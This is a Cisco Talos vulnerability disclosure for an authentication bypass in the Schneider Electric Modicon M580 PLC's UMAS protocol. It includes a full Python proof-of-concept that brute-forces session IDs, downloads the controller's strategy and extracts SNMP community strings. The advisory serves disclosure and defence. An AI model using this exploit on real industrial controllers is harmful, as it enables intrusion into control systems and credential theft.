Talos Vulnerability Report

TALOS-2018-0741

Schneider Electric Modicon M580 UMAS Improper Authentication Vulnerability

June 10, 2019
CVE Number

CVE-2018-7842

Summary

An exploitable improper authentication vulnerability exists in the UMAS PLC reservation function of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can allow an attacker to masquerade as an authenticated user, resulting in the ability to bypass password protections in place on the device. An attacker can send unauthenticated commands to trigger this vulnerability.

Tested Versions

Schneider Electric Modicon M580 BMEP582040 SV2.70

Product URLs

https://www.schneider-electric.com/en/work/campaign/m580-epac/

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-290: Authentication Bypass by Spoofing

Details

The Modicon M580 is the latest in Schneider Electric’s Modicon line of programmable automation controllers. The device contains a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus and a management protocol referred to as “UMAS.”

During normal operation, the Modicon M580 uses a pair of UMAS requests, TAKE_PLC_RESERVATION and RELEASE_PLC_RESERVATION, to determine which users are allowed to execute privileged commands. When one user has successfully obtained a reservation, no other user is able to execute commands that fall into certain categories, such as UPLOAD_BLOCK.

If a legitimate user writes a new strategy containing a password to the device, that password will be required to make any additional modifications to the device or to run any privileged commands. The correct password must be specified in a TAKE_PLC_RESERVATION request to run any privileged command. If successful, this will return a session ID that has the authorization needed to run privileged commands. The command will fail if the user makes an attempt to run any privileged command without properly gaining an elevated session.

When an existing elevated session is established, most commonly encountered via UnityPro, it is possible to brute force the session ID and send privileged commands under the context of the legitimate user. Session IDs are one byte in size, creating only 256 possible values. By looping through each possible value wrapped in a command that requires a session, such as INITIALIZE_UPLOAD, it is possible to discern a valid elevated session by analyzing the response code. If a response code of 0xFE is received during this loop, a valid session has been found.

The structure of a INITIALIZE_UPLOAD command takes a form similar to this:

    0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f
  +---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
0 | A | B | C |   D   |
  +---+---+---+---+---+

A --> Modbus Function Code (0x5A)
B --> Session
C --> UMAS Function Code   (0x30)
D --> Unknown              (0x0001)

With this valid session, any privileged command can be successfully executed, even if the device password is not known. An easy way to test this is to attempt to download the strategy of a password protected device with a non-elevated session and compare the results to a downloaded strategy from a spoofed elevated session. In the former case the device will give errors and fail to provide any data, whereas in the latter it will return the strategy.

Exploit Proof of Concept

import struct
import socket
from scapy.all import Raw
from scapy.contrib.modbus import ModbusADURequest
from scapy.contrib.modbus import ModbusADUResponse
import random
 
 
def send_message(sock, umas, data=None, wait_for_response=True):
    transId = random.randint(1,0xff)
    if data == None:
        packet = ModbusADURequest(transId=transId)/umas
    else:
        packet = ModbusADURequest(transId=transId)/umas/data
    msg = "%s" % Raw(packet)
    resp = ""
    sock.send(msg)
    if wait_for_response:
        resp = sock.recv(2048)
    return resp
 
def main():
    rhost = "192.168.10.1"
    rport = 502
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((rhost, rport))
 
    session = False
    for i in xrange(255):
        # INITIALIZE_UPLOAD
        mbtcp_fnc = "\x5a"
        umas_fnc = "\x30"
        cur_session = struct.pack("B", i)
        unknown = "\x00\x01"
        umas = "%s%s%s%s" % (mbtcp_fnc, cur_session, umas_fnc, unknown)
        res = send_message(sock=s, umas=umas)
 
        if res[9] == "\xfe":
            session = i
            break
    if session:
        print "Success"
        print "Session Token: %s" % (hex(session))
 
        session = struct.pack("B", session)
 
        # INITIALIZE_DOWNLOAD
        mbtcp_fnc = "\x5a"
        umas_fnc = "\x33"
        unknown = "\x00\x01"
        block_len = "\xfb\x03"
        umas = "%s%s%s%s%s" % (mbtcp_fnc, session, umas_fnc, unknown, block_len)
        send_message(sock=s, umas=umas)
 
        # DOWNLOAD_BLOCK
        mbtcp_fnc = "\x5a"
        umas_fnc  = "\x34"
        unknown1  = "\x00\x01"
        strategy = ""
        for i in xrange(0x49):
            block_num = struct.pack("<H", i)
            umas = "%s%s%s%s%s" % (mbtcp_fnc, session, umas_fnc, unknown1, block_num)
            res = send_message(s, umas)
            if struct.unpack("<H", res[12:14])[0] == 0:
                break
            strategy = "%s%s" % (strategy, res[14:])
         
        # parse the downloaded strategy
        # start by searching for a static heading and cropping down the data
        bfpx_index = strategy.index("BFPX")
        services_section_data = strategy[bfpx_index:]
        bfpx_data_size = 0x38
 
        # parse the downloaded strategy
        # parse the zip file section header table
        services_data = services_section_data[bfpx_data_size:]
        services_data_len = len(services_data)
        data_offset = 0
        snmp_size = 0
        snmp_offset = 0
        header_size = 0x1c
        headers = 0
        for i in xrange(0, services_data_len, header_size):
            section_name = services_section_data[i+0x01:i+0x10]
            if section_name[:3] == "ST_":
                headers += 1
                if "ST_SNMP" in section_name:
                    snmp_size = struct.unpack("<H", services_section_data[i+0x19:i+0x1b])[0]
                    snmp_offset = data_offset
                data_offset += struct.unpack("<H", services_section_data[i+0x19:i+0x1b])[0]
        snmp_offset += headers * header_size
 
        # parse the snmp section data
        snmp_data = services_data[snmp_offset:snmp_offset+snmp_size]
        comm_string_size = 16
        write_offset = 0
        read_offset = write_offset + comm_string_size
        trap_offset = read_offset + comm_string_size
 
        write = snmp_data[write_offset:read_offset]
        read = snmp_data[read_offset:trap_offset]
        trap = snmp_data[trap_offset:trap_offset+comm_string_size]
         
        print "Write:\t%s" % (write)
        print "Read:\t%s" % (read)
        print "Trap:\t%s" % (trap)
 
    else:
        print "No session discovered"
 
 
if __name__ == '__main__':
    main()

Timeline

2018-12-10 - Initial contact
2018-12-17 - Vendor acknowledged
2019-01-01 - 30 day follow up
2019-05-14 - Vendor Patched
2019-06-10 - Public Release

Credit

Discovered by Jared Rittle of Cisco Talos.